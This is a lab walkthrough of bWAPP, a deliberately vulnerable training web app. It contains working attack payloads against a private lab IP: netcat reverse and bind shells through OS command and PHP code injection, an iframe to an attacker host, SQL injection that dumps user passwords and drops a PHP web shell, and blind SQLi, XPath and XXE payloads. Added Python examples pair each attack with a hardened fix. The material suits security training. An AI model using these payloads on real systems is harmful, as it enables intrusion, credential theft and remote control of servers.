bWAPP - Sanjiv Kawa April 2, 2015
10:37 AM
A1 - Injection
  HTML Injection - Reflected (GET)
  HTML Injection - Reflected (POST)
  HTML Injection - Reflected (Current URL)
  HTML Injection - Stored (Blog)
  iFrame Injection
  LDAP Injection (Search)
  Mail Header Injection (SMTP)
  OS Command Injection
  OS Command Injection - Blind
  PHP Code Injection
  Server-Side Includes (SSI) Injection
  SQL Injection (GET/Search)
  SQL Injection (GET/Select)
  SQL Injection (POST/Search)
  SQL Injection (POST/Select)
  SQL Injection (AJAX/JSON/jQuery)
  SQL Injection (CAPTCHA)
  SQL Injection (Login Form/Hero)
  SQL Injection (Login Form/User)
  SQL Injection (SQLite)
  SQL Injection (Drupal)
  SQL Injection - Stored (Blog)
  SQL Injection - Stored (SQLite)
  SQL Injection - Stored (User-Agent)
  SQL Injection - Stored (XML)
  SQL Injection - Blind - Boolean-Based
  SQL Injection - Blind - Time-Based
  SQL Injection - Blind (SQLite)
  SQL Injection - Blind (Web Services/SOAP)
  XML/XPath Injection (Login Form)
  XML/XPath Injection (Search)

A2 - Broken Auth. & Session Mgmt.
  Broken Authentication - CAPTCHA Bypassing
  Broken Authentication - Forgotten Function
  Broken Authentication - Insecure Login Forms
  Broken Authentication - Logout Management
  Broken Authentication - Password Attacks
  Broken Authentication - Weak Passwords
  Session Management - Administrative Portals
  Session Management - Cookies (HTTPOnly)
  Session Management - Cookies (Secure)
  Session Management - Session ID in URL
  Session Management - Strong Sessions

A3 - Cross-Site Scripting (XSS)
  Cross-Site Scripting - Reflected (GET)
  Cross-Site Scripting - Reflected (POST)
  Cross-Site Scripting - Reflected (JSON)
  Cross-Site Scripting - Reflected (AJAX/JSON)
  Cross-Site Scripting - Reflected (AJAX/XML)
  Cross-Site Scripting - Reflected (Back Button)
  Cross-Site Scripting - Reflected (Custom Header)
  Cross-Site Scripting - Reflected (Eval)
  Cross-Site Scripting - Reflected (HREF)
  Cross-Site Scripting - Reflected (Login Form)
  Cross-Site Scripting - Reflected (phpMyAdmin)
  Cross-Site Scripting - Reflected (PHP_SELF)
  Cross-Site Scripting - Reflected (Referer)
  Cross-Site Scripting - Reflected (User-Agent)
  Cross-Site Scripting - Stored (Blog)
  Cross-Site Scripting - Stored (Change Secret)
  Cross-Site Scripting - Stored (Cookies)
  Cross-Site Scripting - Stored (SQLiteManager)
  Cross-Site Scripting - Stored (User-Agent)

A4 - Insecure Direct Object References
  Insecure DOR (Change Secret)
  Insecure DOR (Reset Secret)
  Insecure DOR (Order Tickets)

A5 - Security Misconfiguration
  Arbitrary File Access (Samba)
  Cross-Domain Policy File (Flash)
  Cross-Origin Resource Sharing (AJAX)
  Cross-Site Tracing (XST)
  Denial-of-Service (Large Chunk Size)
  Denial-of-Service (Slow HTTP DoS)
  Denial-of-Service (SSL-Exhaustion)
  Denial-of-Service (XML Bomb)
  Insecure FTP Configuration
  Insecure SNMP Configuration
  Insecure WebDAV Configuration
  Local Privilege Escalation (sendpage)
  Local Privilege Escalation (udev)
  Man-in-the-Middle Attack (HTTP)
  Man-in-the-Middle Attack (SMTP)
  Old/Backup & Unreferenced Files
  Robots File

A6 - Sensitive Data Exposure
  Base64 Encoding (Secret)
  BEAST/CRIME/BREACH Attacks
  Clear Text HTTP (Credentials)
  Heartbleed Vulnerability
  Host Header Attack (Reset Poisoning)
  HTML5 Web Storage (Secret)
  POODLE Vulnerability
  SSL 2.0 Deprecated Protocol
  Text Files (Accounts)

A7 - Missing Functional Level Access Control
  Directory Traversal - Directories
  Directory Traversal - Files
  Host Header Attack (Cache Poisoning)
  Host Header Attack (Reset Poisoning)
  Local File Inclusion (SQLiteManager)
  Remote & Local File Inclusion (RFI/LFI)
  Restrict Device Access
  Restrict Folder Access
  Server Side Request Forgery (SSRF)
  XML External Entity Attacks (XXE)

A8 - Cross-Site Request Forgery (CSRF)
  Cross-Site Request Forgery (Change Password)
  Cross-Site Request Forgery (Change Secret)
  Cross-Site Request Forgery (Transfer Amount)

A9 - Using Known Vulnerable Components
  Buffer Overflow (Local)
  Buffer Overflow (Remote)
  Drupal SQL Injection (Drupageddon)
  Heartbleed Vulnerability
  PHP CGI Remote Code Execution
  PHP Eval Function
  phpMyAdmin BBCode Tag XSS
  Shellshock Vulnerability (CGI)
  SQLiteManager Local File Inclusion
  SQLiteManager PHP Code Injection
  SQLiteManager XSS

A10 - Unvalidated Redirects & Forwards
  Unvalidated Redirects & Forwards (1)
  Unvalidated Redirects & Forwards (2)

Other bugs...
  ClickJacking (Movie Tickets)
  Client-Side Validation (Password)
  HTTP Parameter Pollution
  HTTP Response Splitting
  HTTP Verb Tampering
  Information Disclosure - Favicon
  Information Disclosure - Headers
  Information Disclosure - PHP version
  Information Disclosure - Robots File
  Insecure iFrame (Login Form)
  Unrestricted File Upload

Extras
  A.I.M. - No-authentication Mode
  Client Access Policy File
  Cross-Domain Policy File
  Evil 666 Fuzzing Page
  Manual Intervention Required!
  Unprotected Admin Portal
  We Steal Secrets... (html)
  We Steal Secrets... (plain)
  WSDL File (Web Services/SOAP)
A1: Injection March 31, 2015
9:03 AM
Areas with an asterisk next to them have not been covered in this walkthrough.
  HTML Injection - Reflected (GET)
  HTML Injection - Reflected (POST)
  HTML Injection - Reflected (Current URL)
  HTML Injection - Stored (Blog)
  iFrame Injection
  OS Command Injection
  OS Command Injection - Blind
  PHP Code Injection
  Server-Side Includes (SSI) Injection
  SQL Injection (GET/Search)
  SQL Injection (GET/Select)
  SQL Injection (POST/Search)
  SQL Injection (POST/Select)
  SQL Injection (Login Form/Hero)
  SQL Injection (SQLite)
  SQL Injection (Drupal)
  SQL Injection - Stored (Blog)
  SQL Injection - Stored (SQLite)
  SQL Injection - Stored (User-Agent)
  SQL Injection - Blind - Boolean-Based
  SQL Injection - Blind - Time-Based
  XML/XPath Injection (Login Form)
  *LDAP Injection (Search)
  *Mail Header Injection (SMTP)
  *SQL Injection (AJAX/JSON/jQuery)
  *SQL Injection (CAPTCHA)
  *SQL Injection (Login Form/User)
  *SQL Injection - Stored (XML)
  *SQL Injection - Blind (SQLite)
  *SQL Injection - Blind (Web Services/SOAP)
  *XML/XPath Injection (Search)
HTML Injection - Reflected (GET) March 31, 2015
9:03 AM
HTML Injection - Reflected (GET)

http://192.168.254.131/bWAPP/htmli_get.php?firstname=<...>&lastname=<...>blah&form=submit

(The HTML tags placed in firstname and lastname were stripped from the exported notes; only the parameter skeleton survives.)
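Added example, not code from the walkthrough: how a reflected HTML injection in htmli_get.php is built, detected and fixed. The host, path and parameter names come from the URL above; the probe string, the toy render functions and the welcome text are assumptions made for the demo. The same encoded string is the request body for the POST variant.

```python
# Added example (not from the bWAPP walkthrough): how a reflected HTML
# injection in htmli_get.php is built, detected and fixed. The host, path and
# parameter names come from the URL above; the probe string, the toy render
# functions and the welcome text are assumptions made for the demo.
import html
from urllib.parse import parse_qs, urlencode, urlparse

BASE = "http://192.168.254.131/bWAPP/htmli_get.php"
MARKER = "<b>htmli-canary</b>"   # constructed probe: harmless but unmistakable


def build_url(firstname, lastname):
    """URL-encode the parameters the way a browser submits the GET form
    (for the POST variant the same string is the request body)."""
    return BASE + "?" + urlencode(
        {"firstname": firstname, "lastname": lastname, "form": "submit"})


def params_from_url(url):
    """What the server sees after decoding the query string."""
    return {k: v[0] for k, v in parse_qs(urlparse(url).query).items()}


def render_vulnerable(firstname, lastname):
    """Mimics the vulnerable page: input is concatenated into the HTML."""
    return "<p>Welcome " + firstname + " " + lastname + "</p>"


def render_hardened(firstname, lastname):
    """Fix: escape <, >, &, and quotes before the value reaches the body."""
    return ("<p>Welcome " + html.escape(firstname, quote=True) + " "
            + html.escape(lastname, quote=True) + "</p>")


def is_injectable(body):
    """Vulnerable if the probe's tags come back unescaped in the response."""
    return MARKER in body


if __name__ == "__main__":
    url = build_url(MARKER, "blah")
    p = params_from_url(url)
    print(url)
    print("vulnerable:", is_injectable(render_vulnerable(p["firstname"], p["lastname"])))
    print("hardened  :", is_injectable(render_hardened(p["firstname"], p["lastname"])))
```

A probe with a visible but harmless tag is preferable to a real payload: the check is whether the tag survives encoding on the way back, and the same detector works for the stored (blog) variant by fetching the blog page after posting.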
HTML Injection - Reflected (POST) March 31, 2015
9:08 AM
POST body:
firstname=<...>&lastname=<...>blah&form=submit
(Same payload as the GET variant; the injected tags were stripped from the export.)
HTML Injection - Reflected (URL) March 31, 2015
9:11 AM
HTML Injection - Stored (Blog) March 31, 2015
9:16 AM
<iframe SRC="http://attackerIP/blah" height="0" width="0">
Stored payloads shown in the blog (tags stripped from the export):
test
Session Expired, Please Login:
iFrame Injection March 31, 2015
9:42 AM
http://192.168.254.131/bWAPP/iframei.php?ParamUrl=http://www.hello.com/&ParamWidth=500&ParamHeight=500
OS Command Injection March 31, 2015
10:47 AM
www.nsa.gov && nc -vn 192.168.254.128 4444 -e /bin/bash
; whoami
OS Command Injection (Blind) March 31, 2015
11:07 AM
192.168.254.128 && nc -vn 192.168.254.128 4444 -e /bin/bash
http://thehackpot.blogspot.ca/2014/05/blind-os-command-injection-attacks.html
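Added example, not code from the walkthrough or from bWAPP: the mechanics behind the two command-injection payloads above (the visible one with `;`/`&&`, and the blind one where nothing is reflected), with `echo` standing in for the DNS lookup / ping that the bWAPP pages actually run so that it works offline. The hostname regex, the function names and the sleep-based probe are assumptions for this demo.

```python
# Added example (not from the walkthrough): the mechanics behind the
# command-injection payloads above, with `echo` standing in for the network
# command that bWAPP's pages actually run, so the demo needs no network.
# The hostname regex and the helper names are assumptions for this demo.
import re
import subprocess
import time

# RFC 1123 hostname: dot-separated labels of [A-Za-z0-9-], no edge hyphens
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")


def lookup_vulnerable(target):
    """Like the bWAPP page: the target is pasted into a shell command line,
    so `;`, `&&`, `|` and backticks are interpreted by /bin/sh."""
    proc = subprocess.run("echo " + target, shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def lookup_hardened(target):
    """Fix: allow-list the value as a hostname and pass it as its own argv
    element; no shell ever parses it."""
    if not HOSTNAME_RE.match(target):
        raise ValueError("not a hostname: %r" % target)
    proc = subprocess.run(["echo", target], capture_output=True, text=True)
    return proc.stdout


def is_rejected(target):
    """True when the hardened version refuses the input outright."""
    try:
        lookup_hardened(target)
    except ValueError:
        return True
    return False


def blind_probe(run, target, delay=1):
    """Blind variant: when command output is not reflected, inject a sleep
    and time the response (same idea as the `&& nc` reverse shell above,
    but observable without a listener)."""
    start = time.monotonic()
    try:
        run("%s; sleep %d" % (target, delay))
    except ValueError:
        return False          # hardened code rejected the payload outright
    return time.monotonic() - start >= 0.9 * delay


if __name__ == "__main__":
    print(lookup_vulnerable("www.nsa.gov; echo INJECTED"), end="")
    print("blind, vulnerable:", blind_probe(lookup_vulnerable, "192.168.254.128"))
    print("blind, hardened  :", blind_probe(lookup_hardened, "192.168.254.128"))
```

The timing probe is the cheapest confirmation for the blind page before setting up a netcat listener: a delay that tracks the injected sleep value is a positive even when the response body never changes.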
PHP Code Injection March 31, 2015
11:29 AM
message=1; phpinfo()
phpi.php?message=""; system('nc -lvp 1234 -e /bin/bash')
Server Side Include (SSI) Injection March 31, 2015
11:50 AM
connect to me on port 8888!
SQLi (GET/Search) March 31, 2015
11:53 AM
sqli_1.php?title='&action=search
sqli_1.php?title=iron' or 1=1#&action=search
sqli_1.php?title=validEntry' or 1=2#&action=search
sqli_1.php?title=iron' union select 1,2,3,4,5,6,7 #&action=search
sqli_1.php?title=iron' union select 1,user(),@@version,4,5,6,7 #&action=search
sqli_1.php?title=iron' union select 1,login,password,email,5,6,7 from users #&action=search
sqli_1.php?title=iron' union select 1,"<?php shell_exec($_GET['cmd']) ?>",3,4,5,6,7 into OUTFILE '/var/www/bWAPP/popped.php' #&action=search
The second payload only works when the MySQL user has the FILE privilege and the web root is writable by the database process; shell_exec() returns the command output without printing it, so the dropped file needs an echo around the call before any output appears in the response.
Underlying query (bWAPP wraps the search term in LIKE wildcards):
SELECT * FROM movies WHERE title LIKE '%iron%'
The injected ' closes the string literal and # comments out the trailing %'.
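Added example, not bWAPP code: the GET/Search injection replayed against an in-memory SQLite copy of the movies and users tables, so each step above (the lone quote, the true/false check, counting columns with UNION SELECT, pulling logins and password hashes) runs offline. bWAPP itself runs on MySQL; the 7-column movies layout and the login/password/email columns match the payloads above, but the row contents and hashes are constructed. SQLite has no `#` comment, so `-- ` is used where the walkthrough uses `#`, and `user()`/`@@version` would become `sqlite_version()`. The INTO OUTFILE payload is MySQL-only and is not reproduced.

```python
# Added example (not bWAPP code): the GET/Search injection replayed on an
# in-memory SQLite stand-in. Table layouts follow the column counts used in
# the walkthrough's payloads; all rows, hashes and addresses are constructed.
import hashlib
import sqlite3


def sha1_hex(text):
    return hashlib.sha1(text.encode()).hexdigest()


def make_db():
    """Constructed stand-in for bWAPP's MySQL database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE movies(id INTEGER, title TEXT, release_year TEXT, genre TEXT,
                            main_character TEXT, imdb TEXT, tickets_stock INTEGER);
        INSERT INTO movies VALUES (1, 'Iron Man', '2008', 'action', 'Tony Stark', 'tt0000001', 53);
        INSERT INTO movies VALUES (2, 'The Incredible Hulk', '2008', 'action', 'Bruce Banner', 'tt0000002', 23);
        CREATE TABLE users(id INTEGER, login TEXT, password TEXT, email TEXT);
    """)
    for uid, login, pw in [(1, "A.I.M.", "constructed-pw-1"), (2, "bee", "bug")]:
        db.execute("INSERT INTO users VALUES (?, ?, ?, ?)",
                   (uid, login, sha1_hex(pw), login.lower() + "@example.invalid"))
    return db


def search_vulnerable(db, title):
    """bWAPP-style query: the title is spliced straight into the SQL string."""
    sql = "SELECT * FROM movies WHERE title LIKE '%" + title + "%'"
    return db.execute(sql).fetchall()


def search_hardened(db, title):
    """Fix: bind the value; the LIKE pattern is data, never SQL."""
    return db.execute("SELECT * FROM movies WHERE title LIKE ?",
                      ("%" + title + "%",)).fetchall()


def quote_breaks_query(db):
    """Step 1 (title='): a lone quote produces a SQL syntax error."""
    try:
        search_vulnerable(db, "'")
        return False
    except sqlite3.OperationalError:
        return True


def column_count(db, max_cols=12):
    """Step 2: grow the UNION SELECT until the database stops complaining;
    the first count that works is the number of columns in the SELECT *."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        try:
            search_vulnerable(db, "iron' UNION SELECT " + cols + " -- ")
            return n
        except sqlite3.OperationalError:
            pass
    return None


def dump_users(db, ncols):
    """Step 3: reuse the column count to pull rows from another table.
    Column 1 is tagged 'x' so injected rows can be told apart from real ones."""
    cols = ["'x'"] * ncols
    cols[1:4] = ["login", "password", "email"]
    rows = search_vulnerable(db, "iron' UNION SELECT " + ",".join(cols) + " FROM users -- ")
    return sorted((r[1], r[2], r[3]) for r in rows if r[0] == "x")


if __name__ == "__main__":
    db = make_db()
    print("quote breaks query:", quote_breaks_query(db))
    print("or 1=1 rows:", len(search_vulnerable(db, "iron' OR 1=1 -- ")))
    n = column_count(db)
    print("columns:", n)
    for row in dump_users(db, n):
        print(row)
    print("hardened, same payload:", search_hardened(db, "iron' OR 1=1 -- "))
```

The `validEntry' or 1=2#` step from the walkthrough is the boolean check that separates a real injection from a page that merely errors on odd input: `Iron Man' AND 1=1 -- ` returns the row, `Iron Man' AND 1=2 -- ` returns nothing.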
SQLi (GET/Select) March 31, 2015
12:35 PM
sqli_2.php?movie=1 and 1=2#&action=go
sqli_2.php?movie=1 union select 1,2,3,4,5,6#&action=go
sqli_2.php?movie=1 union select 1,2,3,4,5,6,7#&action=go
sqli_2.php?movie=1337 union select 1,2,3,4,5,6,7#&action=go
sqli_2.php?movie=1337 union select 1,login,3,email,password,6,7 from users#&action=go
SQLi (POST/Search) March 31, 2015
1:07 PM
SQLi (POST/Select) March 31, 2015
1:06 PM
SQLi (Login Form/Hero) March 31, 2015
2:48 PM
'
login=' or 1=1#&password=&form=submit
SQLi Stored (Blog) March 31, 2015
3:34 PM
test','test')#
canary1','canary2')#
canary1',(select password from mysql.user where user='root' limit 0,1))#
canary1',(select version()))#
canary1',(select user()))#
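Added example, not bWAPP code: the INSERT-statement injection behind the blog payloads above, replayed on an in-memory SQLite table. The statement shape `INSERT INTO blog (date, entry, owner) VALUES (<now>, '<entry>', '<owner>')` is inferred from the payloads (bWAPP's real column names may differ), and the MySQL-only pieces (`mysql.user`, `version()`, `#`) are mapped to SQLite equivalents. The user row is constructed.

```python
# Added example (not bWAPP code): INSERT injection via the blog entry field,
# on a constructed SQLite table. The column names are an assumption inferred
# from the walkthrough's payloads; the users row is constructed.
import sqlite3


def make_blog_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE blog(id INTEGER PRIMARY KEY, date TEXT, entry TEXT, owner TEXT);
        CREATE TABLE users(login TEXT, password TEXT);
        INSERT INTO users VALUES ('bee', 'constructed-hash');
    """)
    return db


def latest_entry(db):
    return db.execute("SELECT entry, owner FROM blog ORDER BY id DESC LIMIT 1").fetchone()


def add_entry_vulnerable(db, entry, owner="bee"):
    """Vulnerable: the entry text is spliced into the VALUES list. A payload
    that closes the quote and the parenthesis, then comments out the rest,
    gets to choose the `owner` column; a scalar subquery there reads any
    table and the result is displayed back on the blog page."""
    sql = ("INSERT INTO blog (date, entry, owner) VALUES (datetime('now'), '"
           + entry + "', '" + owner + "')")
    db.execute(sql)
    return latest_entry(db)


def add_entry_hardened(db, entry, owner="bee"):
    """Fix: bound parameters; the payload is stored verbatim as text."""
    db.execute("INSERT INTO blog (date, entry, owner) VALUES (datetime('now'), ?, ?)",
               (entry, owner))
    return latest_entry(db)


if __name__ == "__main__":
    db = make_blog_db()
    for payload in ["test','test')-- ",
                    "canary1',(SELECT password FROM users WHERE login='bee'))-- ",
                    "canary1',(SELECT sqlite_version()))-- "]:
        print("vulnerable:", add_entry_vulnerable(db, payload))
    print("hardened  :", add_entry_hardened(db, "canary1',(SELECT sqlite_version()))-- "))
```

The `canary1`/`canary2` pair from the walkthrough is the right first move: it proves which injected value lands in which column before a subquery is put in one of them.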
SQLi Stored (User-Agent) March 31, 2015
3:56 PM
SQLi Blind (Boolean Based) April 1, 2015
9:31 AM
The page only reports whether a movie exists (a true/false response). This can be leveraged in conjunction with the SUBSTRING function to identify table names, and then column values, one character at a time from the true/false responses.
SQLi Blind (Time Based) April 1, 2015
9:35 AM
test'-IF(MID(VERSION(),1,1) = '5', SLEEP(5), 0)#
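Added example, not code from the walkthrough: the substring technique that the boolean-based note above alludes to, carried out in full against a SQLite stand-in (it also generalises the page's time-based payload to any character position). bWAPP runs on MySQL, hence `MID()`, `VERSION()` and `SLEEP()` in the payload above; SQLite spells these `substr()`/`sqlite_version()` and has no `SLEEP()`, so only the boolean oracle is exercised here. The `title = '...'` query shape, the table contents and the helper names are assumptions.

```python
# Added example (not from the walkthrough): boolean-based blind extraction
# with substr() and a binary search over the character value, against a
# constructed SQLite database. The query shape is an assumption.
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE movies(id INTEGER, title TEXT);
        INSERT INTO movies VALUES (1, 'Iron Man');
        CREATE TABLE users(id INTEGER, login TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'bee', 'bug');
    """)
    return db


class BlindOracle:
    """Wraps the page: the only signal is whether a movie with that title
    exists. `requests` counts how many round trips the extraction needed."""

    def __init__(self, db):
        self.db, self.requests = db, 0

    def exists(self, title):
        self.requests += 1
        sql = "SELECT * FROM movies WHERE title = '" + title + "'"
        return len(self.db.execute(sql).fetchall()) > 0


def extract(oracle, known_title, expr, max_len=64):
    """Read the result of `expr` (a SQL scalar subquery) through the oracle.
    Each character is found by binary search over printable ASCII, so it
    costs about 7 requests instead of up to 95 linear guesses."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle.exists(f"{known_title}' AND length(({expr})) >= {pos} -- "):
            break                                   # past the end of the value
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"{known_title}' AND unicode(substr(({expr}),{pos},1)) > {mid} -- "
            if oracle.exists(probe):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def time_based_payload(known_title, pos, char, seconds=5):
    """The MySQL time-based form from the page, generalised to any position:
    the response is delayed only when the guessed character is right."""
    return f"{known_title}'-IF(MID(VERSION(),{pos},1) = '{char}', SLEEP({seconds}), 0)#"


if __name__ == "__main__":
    oracle = BlindOracle(make_db())
    pw = extract(oracle, "Iron Man", "SELECT password FROM users WHERE login='bee'")
    print("password:", pw, "in", oracle.requests, "requests")
    print("version :", extract(oracle, "Iron Man", "SELECT sqlite_version()"))
    print(time_based_payload("test", 1, "5"))
```

The same loop drives the time-based variant: replace `oracle.exists` with a function that times the response to `time_based_payload(...)` and returns whether it exceeded the sleep, and the comparison becomes `MID(...) > CHAR(mid)` instead of an equality test.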
XML/XPATH Injection (Login Form) April 1, 2015
10:14 AM
Intercept responses http://pastebin.com/index/uT6zQGVx
Relevant server-side code:
$login = $_REQUEST["login"];
$login = xmli($login);
$password = $_REQUEST["password"];
$password = xmli($password);
// Loads the XML file
$xml = simplexml_load_file("passwords/heroes.xml");
// XPath search
$result = $xml->xpath("/heroes/hero[login='" . $login . "' and password='" . $password . "']");

Resulting predicate as the inputs change:
[login='" . $login . "' and password='" . $password . "']
[login='' and password='']
[login='whatever'' and password='']
[login='whatever' or 1=1' and password='']
[login='whatever' or 1=1 or '' and password='']
Final payload for the login field: whatever' or 1=1 or '
A2: Broken Authentication April 1, 2015
3:24 PM
Areas with an asterisk next to them have not been covered in this walkthrough.
  Broken Authentication - Insecure Login Forms
  Broken Authentication - Logout Management
  Session Management - Administrative Portals
  *Broken Authentication - CAPTCHA Bypassing
  *Broken Authentication - Forgotten Function
  *Broken Authentication - Password Attacks
  *Broken Authentication - Weak Passwords
  *Session Management - Cookies (HTTPOnly)
  *Session Management - Cookies (Secure)
  *Session Management - Session ID in URL
  *Session Management - Strong Sessions
BA - Insecure Login Form April 1, 2015
3:25 PM
BA - Logout Management April 1, 2015
3:26 PM
BA - Session Management April 1, 2015
3:31 PM
A4: Insecure Direct Object References April 1, 2015
3:46 PM
Areas with an asterisk next to them have not been covered in this walkthrough.
  Insecure DOR (Change Secret)
  Insecure DOR (Order Tickets)
  *Insecure DOR (Reset Secret)
Insecure Direct Object Reference (Change Secret) April 1, 2015
3:42 PM
The login value "bee" submitted with the change-secret form can be changed to "bob", which overwrites another user's secret because the server trusts the client-supplied login rather than the session.
Insecure Direct Object Reference (Order Ticket) April 1, 2015
3:51 PM
A6: Sensitive Data Exposure April 2, 2015
9:15 AM
Areas with an asterisk next to them have not been covered in this walkthrough.
  Base64 Encoding (Secret)
  HTML5 Web Storage (Secret)
  *BEAST/CRIME/BREACH Attacks
  *Clear Text HTTP (Credentials)
  *Heartbleed Vulnerability
  *Host Header Attack (Reset Poisoning)
  *POODLE Vulnerability
  *SSL 2.0 Deprecated Protocol
  *Text Files (Accounts)
Base64 Encoding April 2, 2015
9:15 AM
HTML5 Web Storage April 2, 2015
9:16 AM
A7: Missing Functional Level Access Control April 1, 2015
4:06 PM
Areas with an asterisk next to them have not been covered in this walkthrough.
  Directory Traversal - Files
  Host Header Attack (Cache Poisoning)
  Remote & Local File Inclusion (RFI/LFI)
  Restrict Device Access
  XML External Entity Attacks (XXE)
  *Directory Traversal - Directories
  *Host Header Attack (Reset Poisoning)
  *Local File Inclusion (SQLiteManager)
  *Restrict Folder Access
  *Server Side Request Forgery (SSRF)
Directory Traversal (Directories) April 1, 2015
4:07 PM
Directory Traversal (Files) Wednesday, April 1, 2015
7:48 PM
Host Header Attack (Cache Poisoning) Wednesday, April 1, 2015
8:02 PM
Remote and Local File Inclusion Wednesday, April 1, 2015
8:27 PM
Restrict Device Access Wednesday, April 1, 2015
8:38 PM
User-Agent sent to bypass the device check:
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/6531.22.7
XML External Entity Attacks (XXE) April 2, 2015
8:24 AM
XXE request body (the DOCTYPE and entity declaration preceding ]> did not survive the export; the entity was named popped):
...]>
<reset><login>&popped;</login><secret>Any bugs?</secret></reset>
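Added example, not code from the walkthrough: the XXE request above, rebuilt with an entity declaration and parsed two ways with Python's expat-based SAX parser, so the effect of an external entity can be observed offline. The `<reset>/<login>/<secret>` body follows the request shown above; the entity's target is a temporary file created here with a constructed secret, not a path from the page, and the function and class names are assumptions.

```python
# Added example (not from the walkthrough): an XXE body like the one above,
# parsed by a vulnerable configuration (external entities resolved) and by
# the hardened default. The target file and its secret are constructed here.
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


def xxe_payload(target_path):
    """The reset-secret body with the login element replaced by an external
    entity pointing at a local file on the server."""
    return (b'<?xml version="1.0"?>\n'
            b'<!DOCTYPE reset [<!ENTITY popped SYSTEM "' + target_path.encode() + b'">]>\n'
            b'<reset><login>&popped;</login><secret>Any bugs?</secret></reset>')


class FieldCollector(ContentHandler):
    """Collects the text of each element, the way a server would read
    login and secret out of the request."""

    def __init__(self):
        super().__init__()
        self.fields = {}
        self._cur = None

    def startElement(self, name, attrs):
        self._cur = name
        self.fields.setdefault(name, "")

    def characters(self, content):
        if self._cur:
            self.fields[self._cur] += content

    def endElement(self, name):
        self._cur = None


def parse_reset(xml_bytes, resolve_external_entities):
    """resolve_external_entities=True reproduces a vulnerable server; False
    is Python's default since 3.7.1 and is what a hardened parser does."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = FieldCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.fields


def demo(secret="flag{constructed-secret}"):
    """Returns (what a vulnerable parser leaks, what a hardened one yields)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write(secret)
    try:
        payload = xxe_payload(f.name)
        leaked = parse_reset(payload, True)["login"]
        safe = parse_reset(payload, False)["login"]
    finally:
        os.unlink(f.name)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable parser, login field:", repr(leaked))
    print("hardened parser,   login field:", repr(safe))
```

On bWAPP the leaked file content comes back in the page's response because the login value is echoed; when it is not, the same entity can be pointed at an attacker-controlled URL and exfiltrated out of band.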
Extras: PHP Eval() April 2, 2015
1:38 PM
http://www.exploit-db.com/papers/13694/ http://insecurety.net/?p=705